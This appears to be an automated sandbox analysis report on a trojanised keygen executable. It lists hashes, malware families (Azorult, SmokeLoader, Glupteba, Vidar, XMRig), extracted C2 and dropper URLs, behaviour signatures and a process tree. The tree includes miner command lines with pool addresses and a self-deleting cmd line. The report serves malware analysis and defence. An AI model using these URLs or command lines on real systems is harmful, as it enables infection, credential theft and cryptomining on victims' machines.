Analysis
-
max time kernel
33s -
max time network
600s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
02-04-2021 20:55
General
-
Target
Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe
-
Size
5.4MB
-
MD5
b401dc45a17f4b2acf6f9cf7141683c8
-
SHA1
10a6c5c6dec6ea11f9512e20cc655d53efdb3302
-
SHA256
45fde52ed17c4165995ac279c880225f5725a83c0426dc57886fbabde8dae637
-
SHA512
9f2b2049589a06b678ee4672bc6b493be4ac4a783d8b450830a100c439e90ba7bf4e81fff51bc46800a59365f8447cc31f19e1f2d4a22a0b4983ae56fec9f7d8
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://labsclub.com/welcome
Extracted
Family
azorult
C2
http://kvaka.li/1210776429.php
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
smokeloader
Version
2020
C2
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
rc4.i32
rc4.i32
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 3 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Pony,Fareit
Pony is a Remote Access Trojan application that steals information.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
XMRig Miner Payload 8 IoCs
-
Executes dropped EXE 19 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 8 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 16 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 48 IoCs
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Kills process with taskkill 6 IoCs
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 5 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Runs ping.exe 1 TTPs 5 IoCs
-
Script User-Agent 15 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 34 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe"C:\Users\Admin\AppData\Local\Temp\Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\UY3FJ3LTSM\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\UY3FJ3LTSM\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\UY3FJ3LTSM\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\UY3FJ3LTSM\multitimer.exe" 1 3.1617396968.606784e869c0a 1016⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\UY3FJ3LTSM\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\UY3FJ3LTSM\multitimer.exe" 2 3.1617396968.606784e869c0a7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\cace00t3sak\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\cace00t3sak\Setup3310.exe" /Verysilent /subid=5778⤵
-
C:\Users\Admin\AppData\Local\Temp\is-F5HE1.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-F5HE1.tmp\Setup3310.tmp" /SL5="$40222,138429,56832,C:\Users\Admin\AppData\Local\Temp\cace00t3sak\Setup3310.exe" /Verysilent /subid=5779⤵
-
C:\Users\Admin\AppData\Local\Temp\is-69NK1.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-69NK1.tmp\Setup.exe" /Verysilent10⤵
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 92812⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 100412⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 101612⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 114812⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 116412⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 119212⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 129212⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 157612⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 151612⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 149212⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 173612⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 180812⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 178812⤵
- Program crash
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"11⤵
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\is-9GJMJ.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-9GJMJ.tmp\LabPicV3.tmp" /SL5="$30560,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"12⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-BO6FE.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-BO6FE.tmp\ppppppfy.exe" /S /UID=lab21413⤵
-
C:\Users\Admin\AppData\Local\Temp\IBIFFUZVVW\prolab.exe"C:\Users\Admin\AppData\Local\Temp\IBIFFUZVVW\prolab.exe" /VERYSILENT14⤵
-
C:\Users\Admin\AppData\Local\Temp\is-7M103.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-7M103.tmp\prolab.tmp" /SL5="$3045A,575243,216576,C:\Users\Admin\AppData\Local\Temp\IBIFFUZVVW\prolab.exe" /VERYSILENT15⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\89-280c6-2e9-1dc8b-ce491c1a16c6d\Bimolamylu.exe"C:\Users\Admin\AppData\Local\Temp\89-280c6-2e9-1dc8b-ce491c1a16c6d\Bimolamylu.exe"14⤵
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 233615⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\60-eaac9-580-fbdb4-f33cb819192e6\Vyrecilezha.exe"C:\Users\Admin\AppData\Local\Temp\60-eaac9-580-fbdb4-f33cb819192e6\Vyrecilezha.exe"14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yttno0os.vnm\md6_6ydj.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\yttno0os.vnm\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\yttno0os.vnm\md6_6ydj.exe16⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zrzlqdqs.pwe\askinstall31.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\zrzlqdqs.pwe\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\zrzlqdqs.pwe\askinstall31.exe16⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0s0d0xmp.vbf\toolspab1.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\0s0d0xmp.vbf\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\0s0d0xmp.vbf\toolspab1.exe16⤵
-
C:\Users\Admin\AppData\Local\Temp\0s0d0xmp.vbf\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\0s0d0xmp.vbf\toolspab1.exe17⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r2ushihf.b01\setup_10.2_mix.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\r2ushihf.b01\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\r2ushihf.b01\setup_10.2_mix.exe16⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\olx2oeio.p54\GcleanerWW.exe /mixone & exit15⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\52ncxi44.uhb\app.exe /8-2222 & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\52ncxi44.uhb\app.exeC:\Users\Admin\AppData\Local\Temp\52ncxi44.uhb\app.exe /8-222216⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mdwv4srf.41l\file.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\mdwv4srf.41l\file.exeC:\Users\Admin\AppData\Local\Temp\mdwv4srf.41l\file.exe16⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"17⤵
-
C:\Users\Admin\AppData\Local\Temp\KAF5B8BOBC\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KAF5B8BOBC\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵
-
C:\Users\Admin\AppData\Local\Temp\KAF5B8BOBC\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KAF5B8BOBC\multitimer.exe" 1 3.1617397295.6067862f5e0e6 10119⤵
-
C:\Users\Admin\AppData\Local\Temp\KAF5B8BOBC\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KAF5B8BOBC\multitimer.exe" 2 3.1617397295.6067862f5e0e620⤵
-
C:\Users\Admin\AppData\Local\Temp\1afj0zpyffd\vict.exe"C:\Users\Admin\AppData\Local\Temp\1afj0zpyffd\vict.exe" /VERYSILENT /id=53521⤵
-
C:\Users\Admin\AppData\Local\Temp\is-L885G.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-L885G.tmp\vict.tmp" /SL5="$107D6,870426,780800,C:\Users\Admin\AppData\Local\Temp\1afj0zpyffd\vict.exe" /VERYSILENT /id=53522⤵
-
C:\Users\Admin\AppData\Local\Temp\is-VS431.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-VS431.tmp\win1host.exe" 53523⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vkas1dbxsvb\app.exe"C:\Users\Admin\AppData\Local\Temp\vkas1dbxsvb\app.exe" /8-2321⤵
-
-
C:\Users\Admin\AppData\Local\Temp\4xx2l2b4z30\swj03qnqgi0.exe"C:\Users\Admin\AppData\Local\Temp\4xx2l2b4z30\swj03qnqgi0.exe" /ustwo INSTALL21⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8740 -s 88422⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8740 -s 96422⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\v0cvsuyo322\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\v0cvsuyo322\cpyrix.exe" /VERYSILENT21⤵
-
-
C:\Users\Admin\AppData\Local\Temp\h4rpqzj4r3q\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\h4rpqzj4r3q\Setup3310.exe" /Verysilent /subid=57721⤵
-
C:\Users\Admin\AppData\Local\Temp\is-43O9G.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-43O9G.tmp\Setup3310.tmp" /SL5="$10836,138429,56832,C:\Users\Admin\AppData\Local\Temp\h4rpqzj4r3q\Setup3310.exe" /Verysilent /subid=57722⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1OXWG96RAV\setups.exe"C:\Users\Admin\AppData\Local\Temp\1OXWG96RAV\setups.exe" ll18⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CO4T0.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-CO4T0.tmp\setups.tmp" /SL5="$5051E,635399,250368,C:\Users\Admin\AppData\Local\Temp\1OXWG96RAV\setups.exe" ll19⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"17⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"17⤵
-
C:\Users\Admin\AppData\Roaming\74D0.tmp.exe"C:\Users\Admin\AppData\Roaming\74D0.tmp.exe"18⤵
-
C:\Users\Admin\AppData\Roaming\74D0.tmp.exe"C:\Users\Admin\AppData\Roaming\74D0.tmp.exe"19⤵
-
-
-
C:\Users\Admin\AppData\Roaming\8413.tmp.exe"C:\Users\Admin\AppData\Roaming\8413.tmp.exe"18⤵
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999919⤵
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999919⤵
-
-
-
C:\Users\Admin\AppData\Roaming\8A9C.tmp.exe"C:\Users\Admin\AppData\Roaming\8A9C.tmp.exe"18⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"17⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\BTRSetp.exe"17⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1jrd3cw3.tfu\Four.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\1jrd3cw3.tfu\Four.exeC:\Users\Admin\AppData\Local\Temp\1jrd3cw3.tfu\Four.exe16⤵
-
C:\Users\Admin\AppData\Local\Temp\P0B0YSM9WH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\P0B0YSM9WH\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵
-
C:\Users\Admin\AppData\Local\Temp\P0B0YSM9WH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\P0B0YSM9WH\multitimer.exe" 1 3.1617397294.6067862e408fe 10418⤵
-
C:\Users\Admin\AppData\Local\Temp\P0B0YSM9WH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\P0B0YSM9WH\multitimer.exe" 2 3.1617397294.6067862e408fe19⤵
-
C:\Users\Admin\AppData\Local\Temp\3gllmmx1bjk\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\3gllmmx1bjk\Setup3310.exe" /Verysilent /subid=57720⤵
-
C:\Users\Admin\AppData\Local\Temp\is-D616D.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-D616D.tmp\Setup3310.tmp" /SL5="$2059A,138429,56832,C:\Users\Admin\AppData\Local\Temp\3gllmmx1bjk\Setup3310.exe" /Verysilent /subid=57721⤵
-
C:\Users\Admin\AppData\Local\Temp\is-JGDGM.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-JGDGM.tmp\Setup.exe" /Verysilent22⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\knuqewc3oq5\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\knuqewc3oq5\cpyrix.exe" /VERYSILENT20⤵
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe21⤵
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe21⤵
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"22⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sbzocrl4t1x\app.exe"C:\Users\Admin\AppData\Local\Temp\sbzocrl4t1x\app.exe" /8-2320⤵
-
-
C:\Users\Admin\AppData\Local\Temp\hxzz2npnw3n\ysuxzu1tbhq.exe"C:\Users\Admin\AppData\Local\Temp\hxzz2npnw3n\ysuxzu1tbhq.exe" /ustwo INSTALL20⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8716 -s 65621⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8716 -s 66021⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8716 -s 67221⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8716 -s 64821⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\4gjsjrko3qo\vict.exe"C:\Users\Admin\AppData\Local\Temp\4gjsjrko3qo\vict.exe" /VERYSILENT /id=53520⤵
-
C:\Users\Admin\AppData\Local\Temp\is-25G4K.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-25G4K.tmp\vict.tmp" /SL5="$9043E,870426,780800,C:\Users\Admin\AppData\Local\Temp\4gjsjrko3qo\vict.exe" /VERYSILENT /id=53521⤵
-
C:\Users\Admin\AppData\Local\Temp\is-JE41N.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-JE41N.tmp\win1host.exe" 53522⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\MGEFZRRE0J\setups.exe"C:\Users\Admin\AppData\Local\Temp\MGEFZRRE0J\setups.exe" ll17⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SMTD2.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-SMTD2.tmp\setups.tmp" /SL5="$30184,635399,250368,C:\Users\Admin\AppData\Local\Temp\MGEFZRRE0J\setups.exe" ll18⤵
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\is-NQVQ6.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-NQVQ6.tmp\lylal220.tmp" /SL5="$40360,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QQ6B7.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-QQ6B7.tmp\Microsoft.exe" /S /UID=lylal22013⤵
-
C:\Program Files\javcse\FBIGLCASKL\irecord.exe"C:\Program Files\javcse\FBIGLCASKL\irecord.exe" /VERYSILENT14⤵
-
C:\Users\Admin\AppData\Local\Temp\is-K403A.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-K403A.tmp\irecord.tmp" /SL5="$402B6,6265333,408064,C:\Program Files\javcse\FBIGLCASKL\irecord.exe" /VERYSILENT15⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\48-a6a10-cf0-f72a7-de1aff2933d6d\Hawefalaeka.exe"C:\Users\Admin\AppData\Local\Temp\48-a6a10-cf0-f72a7-de1aff2933d6d\Hawefalaeka.exe"14⤵
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 191215⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\38-d1e89-d09-f76a6-805835632a603\Naelazhojaji.exe"C:\Users\Admin\AppData\Local\Temp\38-d1e89-d09-f76a6-805835632a603\Naelazhojaji.exe"14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2ikv23il.og0\md6_6ydj.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\2ikv23il.og0\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\2ikv23il.og0\md6_6ydj.exe16⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 327217⤵
- Program crash
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\awy0v1ih.yha\askinstall31.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\awy0v1ih.yha\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\awy0v1ih.yha\askinstall31.exe16⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rlp3efj3.mm2\toolspab1.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\rlp3efj3.mm2\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\rlp3efj3.mm2\toolspab1.exe16⤵
-
C:\Users\Admin\AppData\Local\Temp\rlp3efj3.mm2\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\rlp3efj3.mm2\toolspab1.exe17⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\va1gnas2.dgp\setup_10.2_mix.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\va1gnas2.dgp\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\va1gnas2.dgp\setup_10.2_mix.exe16⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\App\app.bat" "17⤵
